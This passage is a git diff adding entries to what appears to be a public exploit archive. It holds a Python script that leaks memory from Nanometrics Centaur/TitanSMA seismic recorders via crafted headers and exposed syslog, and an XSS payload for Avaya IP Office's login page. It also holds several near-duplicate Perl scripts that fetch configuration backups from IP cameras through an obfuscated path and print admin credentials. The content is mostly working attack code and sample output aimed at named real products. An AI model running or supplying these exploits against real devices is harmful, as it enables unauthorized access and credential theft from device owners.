+        print  "[ Password : ", $1, "\n" if ($config =~ /password=(.*)/);
+        exit;
+}
\ No newline at end of file
diff --git a/exploits/hardware/webapps/48098.py b/exploits/hardware/webapps/48098.py
new file mode 100755
index 000000000..39b9c2999
--- /dev/null
+++ b/exploits/hardware/webapps/48098.py
@@ -0,0 +1,207 @@
+# Exploit Title: Nanometrics Centaur 4.3.23 - Unauthenticated Remote Memory Leak
+# Date: 2020-02-15
+# Author: byteGoblin
+# Vendor: https://www.nanometrics.ca
+# Product: https://www.nanometrics.ca/products/accelerometers/titan-sma
+# Product: https://www.nanometrics.ca/products/digitizers/centaur-digital-recorder
+# CVE: N/A
+#
+# Nanometrics Centaur / TitanSMA Unauthenticated Remote Memory Leak Exploit
+#
+#
+# Vendor: Nanometrics Inc.
+# Product page: https://www.nanometrics.ca/products/accelerometers/titan-sma
+# Product page: https://www.nanometrics.ca/products/digitizers/centaur-digital-recorder
+#
+# Affected versions:
+#   Centaur  <= 4.3.23
+#   TitanSMA <= 4.2.20
+#
+# Summary:
+#   The Centaur Digital Recorder is a portable geophysical sensing acquisition system that consists
+#   of a high-resolution 24-bit ADC, a precision GNSS-based clock, and removable storage capabilities.
+#   Its ease of use simplifies high performance geophysical sensing deplayments in both remote and
+#   networked environments. Optimized for seismicity monitoring, the Centaur is also well-suited for
+#   infrasound and similar geophysical sensor recording applications requiring sample rates up to
+#   5000 sps.
+#
+# Summary:
+#   The TitanSMA is a strong motion accelerograph designed for high precision observational and
+#   structural engineering applications, where scientists and engineers require exceptional dynamic
+#   range over a wide frequency band.
+#
+# Description:
+#   An information disclosure vulnerability exists when Centaur and TitanSMA fail to properly protect
+#   critical system logs such as 'syslog'. Additionally, the implemented Jetty version (9.4.z-SNAPSHOT)
+#   suffers from a memory leak of shared buffers that was (supposedly) patched in Jetty version 9.2.9.v20150224.
+#   As seen in the aforementioned products, the 'patched' version is still vulnerable to the buffer leakage.
+#   Chaining these vulnerabilities allows an unauthenticated adversary to remotely send malicious HTTP
+#   packets, and cause the shared buffer to 'bleed' contents of shared memory and store these in system
+#   logs. Accessing these unprotected logfiles reveal parts of the leaked buffer (up to 17 bytes per sent
+#   packet) which can be combined to leak sensitive data which can be used to perform session hijacking
+#   and authentication bypass scenarios.
+#
+# Tested on:
+#   Jetty 9.4.z-SNAPSHOT
+#
+# Vulnerability discovered by:
+#   byteGoblin @ zeroscience.mk
+#
+#
+# Advisory ID: ZSL-2020-5562
+# Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2020-5562.php
+#
+# Related CVE: CVE-2015-2080
+# Related CWE: CWE-532, CWE-538
+#
+# 10.02.2020
+#
+
+#!/usr/bin/env python3
+
+import requests
+import re
+import sys
+
+class Goblin:
+    def __init__(self):
+        self.host = None
+        self.page = "/zsl"
+        self.syslog = "/logs/syslog"
+        self.buffer_pad = "A" * 70
+        self.buffer = None
+        self.payload = "\xFF"
+        self.payloads_to_send = 70 # 70 seems to be a good number before we get weird results
+        self.body = {}
+        self.headers = None
+        self.syslog_data = {}
+        self.last_line = None
+        self.before_last_line = True
+
+    def banner(self):
+        goblin = """
+                        NN                          
+                      NkllON                        
+                      0;;::k000XN       KxllokN     
+                      0;,:,;;;;:ldK   Kdccc::oK     
+                     Nx,';codddl:::dkdc:c:;lON      
+                   klc:clloooooooc,.':lc;'lX        
+                   x;:ooololccllc:,:ll:,:xX         
+                    Kd:cllc'..';:ccclc,.x            _               .             ___          _       .           
+                  NOoc::c:,'';:ccllc::''k            \ ___  ,    .  _/_     ___  .'   \    __.  \ ___   |   ` , __  
+                Nklc:clccc;.;odoollc:',xN            |/   \ |    `   |    .'   ` |       .'   \ |/   \  |   | |'  `.
+               0l:lollc:;:,.,ccllcc:;..cOKKX         |    ` |    |   |    |----' |    _  |    | |    `  |   | |    |
+              0c;lolc;'...',;;:::::;..:cc:,cK        `___,'  `---|.  \__/ `.___,  `.___|  `._.' `___,' /\__ / /    |
+             Nc'clc;..,,,:::c:;;;,'..:oddoc;c0               \___/                                                  
+             Nl';;,:,.;:,;:;;;,'.....cccc:;..x              InTrOdUcEs: //Nano-Bleed//
+              XxclkXk;'::,,,''';:::;'''...'',:o0    
+                     Kl,''',:cccccc:;..';;;:cc;;dX          Discovered / Created by:    byteGoblin
+                     O,.,;;,;:::::;;,,;::,.';:c';K          contact:                    bytegoblin <at> zeroscience.mk
+             Kdcccccdl'';;..'::;;,,,;:::;,'..;:.;K              
+            d;,;;'...',,,:,..,;,',,;;,,,'.cd,':.;K          Vendor:                     Nanometrics Inc. - nanometrics.ca
+            Oddl',,'',:cxX0:....'',,''..;dKKl,;,,xN         Product:                    Centaur, TitanSMA
+               d...'ckN Xkl:,',:clll:,..,cxd;,::,,xN        Affected versions:          <= 4.3.23, <= 4.3.20
+              0:',';k Xx:,''..,cccc::c:'.';:;..,;,lK
+             0:'clc':o;',;,,.';loddolc;'.,cc'.;olkN         CVE:                        N/A
+            0:'cdxdc,..';..,lOo,:clc:'.,:ccc;.oN            Advisory:                   ZSL-2020-5562 / zeroscience.mk/en/vulnerabilities/ZSL-2020-5562.php
+            :,;okxdc,..,,..lK Xkol;:x0kl;;::;':0    
+            x:,:odo:,'.',,.'xN   0lk   Nk;';:;.cN           Description:                Unauthenticated Remote Memory Leak in Nanometrics Centaur product
+             Xx:,'':xk:..,''lK    Y      k;';;';xX          
+               XOkkko'.....'O             d.';;,,:xN
+                   0dooooooxX             x'.'''',oK                _.o-'( Shout-out to the bois: LiquidWorm, 0nyxd, MemeQueen, Vaakos, Haunt3r )'-o._
+                                          XOkkkkkON 
+        """
+        print(goblin)
+
+    def generate_payload(self, amount_of_bytes):
+        self.payload += "\x00" * amount_of_bytes
+        self.headers = {"Cookie": self.buffer_pad, "Referer": self.payload}
+
+    def read_syslog(self, initial=False):
+        # Read syslog remotely and filter out 'HeapByteBuffer' messages.
+        # 'initial' is used to make a 'snapshot' of the state before we send payloads...
+        # That way we can filter on what we've just sent.
+        print("[!] - Grabbing syslog from: {}{}".format(self.host, self.syslog))
+        buffer = ""
+        r = requests.get(self.host + self.syslog)
+        if r.status_code == 200:
+            print("[!] - We got syslog, it is: {} bytes".format(len(r.content)))
+            split = r.text.split("\n")
+            for line in split:
+                if "HeapByteBuffer" in line:
+                    if initial:
+                        self.last_line = line
+                    else:
+                        if line == self.last_line:
+                            self.before_last_line = False
+                    if not self.before_last_line:
+                        buffer_addr = re.search("\@\w+", line).group(0).strip("@")
+                        try:
+                            leak = re.search(">>>.+(?=\.\.\.)", line).group(0).strip(">>>")
+                            buffer += leak
+                        except Exception as e:
+                            print(e)
+            if initial:
+                return self.last_line
+            self.buffer = buffer
+        else: # we can't access syslog?
+            print("[!!!] - Yoooo... we can't access syslog? Make sure you can access it, dawg...")
+            print("[!!!] - The status code we got was: {}".format(r.status_code))
+            exit(-1)
+
+    def show_output(self):
+        # we need to translate '\r\n' into actual newlines
+        if self.buffer is not None and self.buffer is not "":
+            self.buffer = self.buffer.replace("\\n", "\n")
+            self.buffer = self.buffer.replace("\\r", "\r")
+            self.buffer = self.buffer.replace("%2f", "/")
+
+        print("[*] BUFFER LENGTH: {}".format(len(self.buffer)))
+        print("=" * 50)
+        print("[*] THIS IS THE LOOT")
+        print("=" * 50)
+        for num, x in enumerate(self.buffer.split("\n")):
+            print("{}.\t| \t{}".format(num, x))
+
+    def send_payload(self, amount):
+        print("[!] - Sending payloads to target: {}{}".format(self.host, self.page))
+        if amount > self.payloads_to_send or amount < 0:
+            amount = self.payloads_to_send
+        for num, x in enumerate(range(0, amount)):
+            if num % 10 == 0:
+                print("[!] - [{}/{}] payloads sent...".format(num, amount))
+            try:
+                self.generate_payload(17)
+                r = requests.post(self.host + self.page, data=self.body, headers=self.headers)
+            except Exception as e:
+                print(e)
+        print("[!] - [{}/{}] payloads sent...".format(amount, amount))
+
+    def parse_sys_args(self):
+        if len(sys.argv) >= 2:
+            self.host = sys.argv[1]
+            if not "http" in self.host:
+                self.host = "http://{}".format(self.host)
+            if len(sys.argv) == 3:
+                # amount of packets to send
+                self.payloads_to_send = sys.argv[2]
+        else:
+            self.print_help()
+
+    def print_help(self):
+        print("Usage: {} <ip_addr[:port]> [amount of payloads to send]".format(sys.argv[0]))
+        print("Example: centaur3.py 123.456.789.0:8080 200")
+        print("\tThis will send 200 payloads to the aforementioned host")
+        print("\tThe [port] and [amount of payloads] are optional")
+        exit(-1)
+
+    def main(self):
+        self.parse_sys_args()
+        self.banner()
+        ll = self.read_syslog(initial=True)
+        self.send_payload(70)
+        self.read_syslog()
+        self.show_output()
+
+if __name__ == '__main__':
+    Goblin().main()
\ No newline at end of file
diff --git a/exploits/hardware/webapps/48105.txt b/exploits/hardware/webapps/48105.txt
new file mode 100644
index 000000000..99c5fccef
--- /dev/null
+++ b/exploits/hardware/webapps/48105.txt
@@ -0,0 +1,17 @@
+# Exploit Title: Avaya IP Office Application Server 11.0.0.0 - Reflective Cross-Site Scripting
+# Release Date: 2019-12-11
+# Exploit Authors: Dan Bohan, Scott Goodwin, OCD Tech
+# Vendor Homepage: https://www.avaya.com/en/
+# Software Link: https://www.avaya.com/en/products/unified-communications/voip/
+# Vulnerable Version: 11.0 FP4 SP1 and before
+# Tested on: 11.0.0.0
+# CVE: CVE-2019-7004
+# Vendor Advisory: ASA-2019-213
+# References: https://downloads.avaya.com/css/P8/documents/101062833
+# https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-7004
+
+Avaya IP Office version 11.0.0.0 and before has a vulnerable login page (username) which is susceptible to cross-site scripting (XSS) via a POST request due to improper sanitization of user input. XSS via a post request allows for arbitrary code to be executed on the client’s system in the security context of the browser. By submitting a specially crafted username, it is possible to execute arbitrary JavaScript.
+
+# PoC
+Username: 41529%22%2F%3E%0A%3Cscript%3Ealert%28%27XSS%21%27%29%3B%3C%2Fscript%3E
+Password: Anything
\ No newline at end of file
diff --git a/exploits/hardware/webapps/48107.pl b/exploits/hardware/webapps/48107.pl
new file mode 100755
index 000000000..1f6db55ce
--- /dev/null
+++ b/exploits/hardware/webapps/48107.pl
@@ -0,0 +1,92 @@
+# Title: ESCAM QD-900 WIFI HD Camera - Remote Configuration Disclosure
+# Author: Todor Donev
+# Date: 2020-02-23
+# Vendor: www.escam.cn
+# Product Link: http://www.escam.cn/search/?class1=&class2=&class3=&searchtype=0&searchword=qd-900&lang=en
+# CVE: N/A
+
+
+#!/usr/bin/perl
+#
+#  ESCAM QD-900 WIFI HD Camera Remote Configuration Disclosure
+#
+#  Copyright 2020 (c) Todor Donev
+#
+#  https://donev.eu/
+#
+#  Disclaimer:
+#  This or previous programs are for Educational purpose ONLY. Do not use it without permission. 
+#  The usual disclaimer applies, especially the fact that Todor Donev is not liable for any damages 
+#  caused by direct or indirect use of the  information or functionality provided by these programs. 
+#  The author or any Internet provider  bears NO responsibility for content or misuse of these programs 
+#  or any derivatives thereof. By using these programs you accept the fact  that any damage (dataloss, 
+#  system crash, system compromise, etc.) caused by the use  of these programs are not Todor Donev's 
+#  responsibility.
+#   
+#  Use them at your own risk!  
+#  
+#  (Dont do anything without permissions)
+#
+#	[ ESCAM QD-900 WIFI HD Camera Remote Configuration Disclosure
+#	[ ===========================================================
+#	[ Exploit Author: Todor Donev 2020 <todor.donev@gmail.com>
+#	[ Initializing the browser
+#	[ >>  User-Agent => Mozilla/5.0 (X11; U; SunOS sun4u; en-US; rv:1.7.5) Gecko/20050105 Epiphany/1.4.8
+#	[ >>  Content-Type => application/x-www-form-urlencoded
+#	[ <<  Connection => close
+#	[ <<  Date => Fri, 21 Feb 2020 20:23:56 GMT
+#	[ <<  Accept-Ranges => bytes
+#	[ <<  Server => thttpd/2.25b 29dec2003
+#	[ <<  Content-Length => 25003
+#	[ <<  Content-Type => application/octet-stream
+#	[ <<  Last-Modified => Fri, 21 Feb 2020 20:23:55 GMT
+#	[ <<  Client-Date => Fri, 21 Feb 2020 20:23:57 GMT
+#	[ <<  Client-Peer => 192.168.1.105:8000
+#	[ <<  Client-Response-Num => 1
+#	[ 
+#	[ Username : admin
+#	[ Password : admin
+
+use strict;
+use HTTP::Request;
+use LWP::UserAgent;
+use WWW::UserAgent::Random;
+use Gzip::Faster 'gunzip';
+
+my $host = shift || ''; # Full path url to the store
+my $cmd = shift || ''; # show - Show configuration dump
+$host =~ s/\/$//;
+print  "\033[2J";    #clear the screen
+print  "\033[0;0H"; #jump to 0,0
+print "[ ESCAM QD-900 WIFI HD Camera Remote Configuration Disclosure\n";
+print "[ ===========================================================\n";
+print "[ Exploit Author: Todor Donev 2020 <todor.donev\@gmail.com>\n";
+if ($host !~ m/^http/){ 
+        print "[ Usage, Password Disclosure: perl $0 https://target:port/\n";
+        print "[ Usage, Show Configuration : perl $0 https://target:port/ show\n";
+        exit;
+}
+print "[ Initializing the browser\n";
+my $user_agent = rand_ua("browsers");
+my $browser  = LWP::UserAgent->new(protocols_allowed => ['http', 'https'],ssl_opts => { verify_hostname => 0 });
+   $browser->timeout(30);
+   $browser->agent($user_agent);
+# my $target = $host."/tmpfs/config_backup.bin";
+my $target = $host."\x2f\x77\x65\x62\x2f\x63\x67\x69\x2d\x62\x69\x6e\x2f\x68\x69\x33\x35\x31\x30\x2f\x62\x61\x63\x6b\x75\x70\x2e\x63\x67\x69";
+my $request = HTTP::Request->new (GET => $target,[Content_Type => "application/x-www-form-urlencoded"]);                      
+my $response = $browser->request($request) or die "[ Exploit Failed: $!";
+print "[ >>  $_ => ", $request->header($_), "\n" for  $request->header_field_names;
+print "[ <<  $_ => ", $response->header($_), "\n" for  $response->header_field_names;
+print "[ Exploit failed! Not vulnerable.\n" and exit if ($response->code ne 200);
+my $gzipped = $response->content();
+my $config = gunzip($gzipped);
+print "[ \n";
+if ($cmd =~ /show/) {
+        print "[ >> Configuration dump...\n[\n";
+        print  "[ ", $_, "\n" for split(/\n/,$config);
+        exit;
+} else {
+        print  "[ Username : ", $1, "\n" if ($config =~ /username=(.*)/);
+        print  "[ Password : ", $1, "\n" if ($config =~ /password=(.*)/);
+        exit;
+}
\ No newline at end of file
diff --git a/exploits/hardware/webapps/48110.txt b/exploits/hardware/webapps/48110.txt
new file mode 100644
index 000000000..6e7f0a326
--- /dev/null
+++ b/exploits/hardware/webapps/48110.txt
@@ -0,0 +1,92 @@
+# Exploit Title: SecuSTATION IPCAM-130 HD Camera - Remote Configuration Disclosure
+# Author: Todor Donev
+# Date: 2020-02-23
+# Vendor: https://secu.jp/
+# Product Link: https://secu.jp/support/831nh1.html
+# CVE: N/A
+
+#
+#  SecuSTATION IPCAM-130 HD Camera Remote Configuration Disclosure
+#
+#  Copyright 2020 (c) Todor Donev
+#
+#  https://donev.eu/
+#
+#  Disclaimer:
+#  This or previous programs are for Educational purpose ONLY. Do not use it without permission. 
+#  The usual disclaimer applies, especially the fact that Todor Donev is not liable for any damages 
+#  caused by direct or indirect use of the  information or functionality provided by these programs. 
+#  The author or any Internet provider  bears NO responsibility for content or misuse of these programs 
+#  or any derivatives thereof. By using these programs you accept the fact  that any damage (dataloss, 
+#  system crash, system compromise, etc.) caused by the use  of these programs are not Todor Donev's 
+#  responsibility.
+#   
+#  Use them at your own risk!  
+#  
+#  (Dont do anything without permissions)
+#
+#	[ SecuSTATION IPCAM-130 HD Camera Remote Configuration Disclosure
+#	[ ===============================================================
+#	[ Exploit Author: Todor Donev 2020 <todor.donev@gmail.com>
+#	[ Initializing the browser
+#	[ >>  User-Agent => Mozilla/5.0 (compatible; Konqueror/3.5; NetBSD 4.0_RC3; X11) KHTML/3.5.7 (like Gecko)
+#	[ >>  Content-Type => application/x-www-form-urlencoded
+#	[ <<  Connection => close
+#	[ <<  Date => Fri, 21 Feb 2020 21:11:37 GMT
+#	[ <<  Accept-Ranges => bytes
+#	[ <<  Server => thttpd/2.25b 29dec2003
+#	[ <<  Content-Length => 32333
+#	[ <<  Content-Type => application/octet-stream
+#	[ <<  Last-Modified => Fri, 21 Feb 2020 21:11:36 GMT
+#	[ <<  Client-Date => Fri, 21 Feb 2020 21:12:23 GMT
+#	[ <<  Client-Peer => 192.168.100.200:81
+#	[ <<  Client-Response-Num => 1
+#	[ 
+#	[ Username : admin
+#	[ Password : admin
+
+#!/usr/bin/perl
+
+use strict;
+use HTTP::Request;
+use LWP::UserAgent;
+use WWW::UserAgent::Random;
+use Gzip::Faster 'gunzip';
+
+my $host = shift || ''; # Full path url to the store
+my $cmd = shift || ''; # show - Show configuration dump
+$host =~ s/\/$//;
+print  "\033[2J";    #clear the screen
+print  "\033[0;0H"; #jump to 0,0
+print "[ SecuSTATION IPCAM-130 HD Camera Remote Configuration Disclosure\n";
+print "[ ===============================================================\n";
+print "[ Exploit Author: Todor Donev 2020 <todor.donev\@gmail.com>\n";
+if ($host !~ m/^http/){ 
+        print "[ Usage, Password Disclosure: perl $0 https://target:port/\n";
+        print "[ Usage, Show Configuration : perl $0 https://target:port/ show\n";
+        exit;
+}
+print "[ Initializing the browser\n";
+my $user_agent = rand_ua("browsers");
+my $browser  = LWP::UserAgent->new(protocols_allowed => ['http', 'https'],ssl_opts => { verify_hostname => 0 });
+   $browser->timeout(30);
+   $browser->agent($user_agent);
+# my $target = $host."/tmpfs/config_backup.bin";
+my $target = $host."\x2f\x77\x65\x62\x2f\x63\x67\x69\x2d\x62\x69\x6e\x2f\x68\x69\x33\x35\x31\x30\x2f\x62\x61\x63\x6b\x75\x70\x2e\x63\x67\x69";
+my $request = HTTP::Request->new (GET => $target,[Content_Type => "application/x-www-form-urlencoded"]);                      
+my $response = $browser->request($request) or die "[ Exploit Failed: $!";
+print "[ >>  $_ => ", $request->header($_), "\n" for  $request->header_field_names;
+print "[ <<  $_ => ", $response->header($_), "\n" for  $response->header_field_names;
+print "[ Exploit failed! Not vulnerable.\n" and exit if ($response->code ne 200);
+my $gzipped = $response->content();
+my $config = gunzip($gzipped);
+print "[ \n";
+if ($cmd =~ /show/) {
+        print "[ >> Configuration dump...\n[\n";
+        print  "[ ", $_, "\n" for split(/\n/,$config);
+        exit;
+} else {
+        print  "[ Username : ", $1, "\n" if ($config =~ /username=(.*)/);
+        print  "[ Password : ", $1, "\n" if ($config =~ /password=(.*)/);
+        exit;
+}
\ No newline at end of file
diff --git a/exploits/hardware/webapps/48115.pl b/exploits/hardware/webapps/48115.pl
new file mode 100755
index 000000000..60dbc08f4
--- /dev/null
+++ b/exploits/hardware/webapps/48115.pl
@@ -0,0 +1,91 @@
+# Exploit Title: SecuSTATION SC-831 HD Camera - Remote Configuration Disclosure
+# Author: Todor Donev
+# Date: 2020-02-23
+# Vendor: https://secu.jp/
+# Product Link: https://secu.jp/support/831.html
+# CVE: N/A
+
+#!/usr/bin/perl
+#
+#  SecuSTATION SC-831 HD Camera Remote Configuration Disclosure
+#
+#  Copyright 2020 (c) Todor Donev 
+#
+#  https://donev.eu/
+#
+#  Disclaimer:
+#  This or previous programs are for Educational purpose ONLY. Do not use it without permission. 
+#  The usual disclaimer applies, especially the fact that Todor Donev is not liable for any damages 
+#  caused by direct or indirect use of the  information or functionality provided by these programs. 
+#  The author or any Internet provider  bears NO responsibility for content or misuse of these programs 
+#  or any derivatives thereof. By using these programs you accept the fact  that any damage (dataloss, 
+#  system crash, system compromise, etc.) caused by the use  of these programs are not Todor Donev's 
+#  responsibility.
+#   
+#  Use them at your own risk!  
+#  
+#  (Dont do anything without permissions)
+#
+#	[ SecuSTATION SC-831 HD Camera Remote Configuration Disclosure
+#	[ ============================================================
+#	[ Exploit Author: Todor Donev 2020 <todor.donev@gmail.com>
+#	[ Initializing the browser
+#	[ >>  User-Agent => Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.1b3pre) Gecko/20081208 SeaMonkey/2.0a3pre
+#	[ >>  Content-Type => application/x-www-form-urlencoded
+#	[ <<  Connection => close
+#	[ <<  Date => Fri, 21 Feb 2020 20:36:59 GMT
+#	[ <<  Accept-Ranges => bytes
+#	[ <<  Server => thttpd/2.25b 29dec2003
+#	[ <<  Content-Length => 25760
+#	[ <<  Content-Type => application/octet-stream
+#	[ <<  Last-Modified => Fri, 21 Feb 2020 20:36:57 GMT
+#	[ <<  Client-Date => Fri, 21 Feb 2020 20:37:01 GMT
+#	[ <<  Client-Peer => 192.168.1.208:80
+#	[ <<  Client-Response-Num => 1
+#	[ 
+#	[ Username : admin
+#	[ Password : admin
+
+use strict;
+use HTTP::Request;
+use LWP::UserAgent;
+use WWW::UserAgent::Random;
+use Gzip::Faster 'gunzip';
+
+my $host = shift || ''; # Full path url to the store
+my $cmd = shift || ''; # show - Show configuration dump
+$host =~ s/\/$//;
+print  "\033[2J";    #clear the screen
+print  "\033[0;0H"; #jump to 0,0
+print "[ SecuSTATION SC-831 HD Camera Remote Configuration Disclosure\n";
+print "[ ============================================================\n";
+print "[ Exploit Author: Todor Donev 2020 <todor.donev\@gmail.com>\n";
+if ($host !~ m/^http/){ 
+        print "[ Usage, Password Disclosure: perl $0 https://target:port/\n";
+        print "[ Usage, Show Configuration : perl $0 https://target:port/ show\n";
+        exit;
+}
+print "[ Initializing the browser\n";
+my $user_agent = rand_ua("browsers");
+my $browser  = LWP::UserAgent->new(protocols_allowed => ['http', 'https'],ssl_opts => { verify_hostname => 0 });
+   $browser->timeout(30);
+   $browser->agent($user_agent);
+# my $target = $host."/tmpfs/config_backup.bin";
+my $target = $host."\x2f\x77\x65\x62\x2f\x63\x67\x69\x2d\x62\x69\x6e\x2f\x68\x69\x33\x35\x31\x30\x2f\x62\x61\x63\x6b\x75\x70\x2e\x63\x67\x69";
+my $request = HTTP::Request->new (GET => $target,[Content_Type => "application/x-www-form-urlencoded"]);                      
+my $response = $browser->request($request) or die "[ Exploit Failed: $!";
+print "[ >>  $_ => ", $request->header($_), "\n" for  $request->header_field_names;
+print "[ <<  $_ => ", $response->header($_), "\n" for  $response->header_field_names;
+print "[ Exploit failed! Not vulnerable.\n" and exit if ($response->code ne 200);
+my $gzipped = $response->content();
+my $config = gunzip($gzipped);
+print "[ \n";
+if ($cmd =~ /show/) {
+        print "[ >> Configuration dump...\n[\n";
+        print  "[ ", $_, "\n" for split(/\n/,$config);
+        exit;
+} else {
+        print  "[ Username : ", $1, "\n" if ($config =~ /username=(.*)/);
+        print  "[ Password : ", $1, "\n" if ($config =~ /password=(.*)/);
+        exit;
+}
\ No newline at end of file
diff --git a/exploits/hardware/webapps/48118.txt b/exploits/hardware/webapps/48118.txt
new file mode 100644
index 000000000..876c51183
--- /dev/null
+++ b/exploits/hardware/webapps/48118.txt
@@ -0,0 +1,91 @@
+# Exploit Title: I6032B-P POE 2.0MP Outdoor Camera - Remote Configuration Disclosure
+# Author: Todor Donev
+# Date: 2020-02-23
+# Vendor: https://www.revotec.com/
+# Product Link: 
+# CVE: N/A
+
+#!/usr/bin/perl
+#
+#  Revotech I6032B-P POE 1920x1080P 2.0MP Outdoor Camera Remote Configuration Disclosure
+#
+#  Copyright 2020 (c) Todor Donev
+#
+#  https://donev.eu/
+#
+#  Disclaimer:
+#  This or previous programs are for Educational purpose ONLY. Do not use it without permission. 
+#  The usual disclaimer applies, especially the fact that Todor Donev is not liable for any damages 
+#  caused by direct or indirect use of the  information or functionality provided by these programs. 
+#  The author or any Internet provider  bears NO responsibility for content or misuse of these programs 
+#  or any derivatives thereof. By using these programs you accept the fact  that any damage (dataloss, 
+#  system crash, system compromise, etc.) caused by the use  of these programs are not Todor Donev's 
+#  responsibility.
+#   
+#  Use them at your own risk!  
+#  
+#  (Dont do anything without permissions)
+#
+#	[ Revotech I6032B-P POE 1920x1080P 2.0MP Outdoor Camera Remote Configuration Disclosure
+#	[ =====================================================================================
+#	[ Exploit Author: Todor Donev 2020 <todor.donev@gmail.com> -- https://donev.eu/
+#	[ Initializing the browser
+#	[ >>  User-Agent => Emacs-W3/4.0pre.46 URL/p4.0pre.46 (i686-pc-linux; X11)
+#	[ >>  Content-Type => application/x-www-form-urlencoded
+#	[ <<  Connection => close
+#	[ <<  Date => Sun, 23 Feb 2020 10:57:32 GMT
+#	[ <<  Accept-Ranges => bytes
+#	[ <<  Server => thttpd/2.25b 29dec2003
+#	[ <<  Content-Length => 23876
+#	[ <<  Content-Type => application/octet-stream
+#	[ <<  Last-Modified => Sun, 23 Feb 2020 10:57:32 GMT
+#	[ <<  Client-Date => Sun, 23 Feb 2020 10:57:44 GMT
+#	[ <<  Client-Response-Num => 1
+#	[ 
+#	[ Username : admin
+#	[ Password : admin
+
+use strict;
+use HTTP::Request;
+use LWP::UserAgent;
+use WWW::UserAgent::Random;
+use Gzip::Faster 'gunzip';
+
+my $host = shift || ''; # Full path url to the store
+my $cmd = shift || ''; # show - Show configuration dump
+$host =~ s/\/$//;
+print  "\033[2J";    #clear the screen
+print  "\033[0;0H"; #jump to 0,0
+print "[ Revotech I6032B-P POE 1920x1080P 2.0MP Outdoor Camera Remote Configuration Disclosure\n";
+print "[ =====================================================================================\n";
+print "[ Exploit Author: Todor Donev 2020 <todor.donev\@gmail.com> -- https://donev.eu/\n";
+if ($host !~ m/^http/){ 
+        print "[ Usage, Password Disclosure: perl $0 https://target:port/\n";
+        print "[ Usage, Show Configuration : perl $0 https://target:port/ show\n";
+        exit;
+}
+print "[ Initializing the browser\n";
+my $user_agent = rand_ua("browsers");
+my $browser  = LWP::UserAgent->new(protocols_allowed => ['http', 'https'],ssl_opts => { verify_hostname => 0 });
+   $browser->timeout(30);
+   $browser->agent($user_agent);
+# my $target = $host."/config_backup.bin";
+# my $target = $host."/tmpfs/config_backup.bin";
+my $target = $host."\x2f\x77\x65\x62\x2f\x63\x67\x69\x2d\x62\x69\x6e\x2f\x68\x69\x33\x35\x31\x30\x2f\x62\x61\x63\x6b\x75\x70\x2e\x63\x67\x69";
+my $request = HTTP::Request->new (GET => $target,[Content_Type => "application/x-www-form-urlencoded"]);                      
+my $response = $browser->request($request) or die "[ Exploit Failed: $!";
+print "[ >>  $_ => ", $request->header($_), "\n" for  $request->header_field_names;
+print "[ <<  $_ => ", $response->header($_), "\n" for  $response->header_field_names;
+print "[ Exploit failed! Not vulnerable.\n" and exit if ($response->code ne 200);
+my $gzipped = $response->content();
+my $config = gunzip($gzipped);
+print "[ \n";
+if ($cmd =~ /show/) {
+        print "[ >> Configuration dump...\n[\n";
+        print  "[ ", $_, "\n" for split(/\n/,$config);
+        exit;
+} else {
+        print  "[ Username : ", $1, "\n" if ($config =~ /username=(.*)/);
+        print  "[ Password : ", $1, "\n" if ($config =~ /password=(.*)/);
+        exit;
+}
\ No newline at end of file
diff --git a/exploits/hardware/webapps/48127.pl b/exploits/hardware/webapps/48127.pl
new file mode 100755
index 000000000..75d5687a2
--- /dev/null
+++ b/exploits/hardware/webapps/48127.pl
@@ -0,0 +1,92 @@
+# Exploit Title: Aptina AR0130 960P 1.3MP Camera - Remote Configuration Disclosure
+# Author: Todor Donev
+# Date: 2020-02-23
+# Vendor: https://acesecurity.jp
+# Product Link: https://acesecurity.jp/support/top/wip_series/wip-90113
+# CVE: N/A
+
+#!/usr/bin/perl
+#
+#  ACE SECURITY WiP-90113 HD Camera Remote Configuration Disclosure
+#
+#  Copyright 2020 (c) Todor Donev
+#
+#  https://donev.eu/
+#
+#  Disclaimer:
+#  This or previous programs are for Educational purpose ONLY. Do not use it without permission. 
+#  The usual disclaimer applies, especially the fact that Todor Donev is not liable for any damages 
+#  caused by direct or indirect use of the  information or functionality provided by these programs. 
+#  The author or any Internet provider  bears NO responsibility for content or misuse of these programs 
+#  or any derivatives thereof. By using these programs you accept the fact  that any damage (dataloss, 
+#  system crash, system compromise, etc.) caused by the use  of these programs are not Todor Donev's 
+#  responsibility.
+#   
+#  Use them at your own risk!  
+#  
+#  (Dont do anything without permissions)
+#
+#	[ ACE SECURITY WiP-90113 HD Camera Remote Configuration Disclosure
+#	[ ================================================================
+#	[ Exploit Author: Todor Donev 2020 <todor.donev@gmail.com>
+#	[ Initializing the browser
+#	[ >>  User-Agent => Mozilla/5.0 (compatible; Konqueror/3.5; NetBSD 4.0_RC3; X11) KHTML/3.5.7 (like Gecko)
+#	[ >>  Content-Type => application/x-www-form-urlencoded
+#	[ <<  Connection => close
+#	[ <<  Date => Sat, 22 Feb 2020 14:10:01 GMT
+#	[ <<  Accept-Ranges => bytes
+#	[ <<  Server => thttpd/2.25b 29dec2003
+#	[ <<  Content-Length => 25893
+#	[ <<  Content-Type => application/octet-stream
+#	[ <<  Last-Modified => Sat, 22 Feb 2020 14:10:00 GMT
+#	[ <<  Client-Date => Sat, 22 Feb 2020 14:10:04 GMT
+#	[ <<  Client-Peer => 192.168.200.49:8080
+#	[ <<  Client-Response-Num => 1
+#	[ 
+#	[ Username : admin
+#	[ Password : admin
+
+use strict;
+use HTTP::Request;
+use LWP::UserAgent;
+use WWW::UserAgent::Random;
+use Gzip::Faster 'gunzip';
+
+my $host = shift || ''; # Full path url to the store
+my $cmd = shift || ''; # show - Show configuration dump
+$host =~ s/\/$//;
+print  "\033[2J";    #clear the screen
+print  "\033[0;0H"; #jump to 0,0
+print "[ ACE SECURITY WiP-90113 HD Camera Remote Configuration Disclosure\n";
+print "[ ================================================================\n";
+print "[ Exploit Author: Todor Donev 2020 <todor.donev\@gmail.com>\n";
+if ($host !~ m/^http/){ 
+        print "[ Usage, Password Disclosure: perl $0 https://target:port/\n";
+        print "[ Usage, Show Configuration : perl $0 https://target:port/ show\n";
+        exit;
+}
+print "[ Initializing the browser\n";
+my $user_agent = rand_ua("browsers");
+my $browser  = LWP::UserAgent->new(protocols_allowed => ['http', 'https'],ssl_opts => { verify_hostname => 0 });
+   $browser->timeout(30);
+   $browser->agent($user_agent);
+# my $target = $host."/config_backup.bin";
+# my $target = $host."/tmpfs/config_backup.bin";
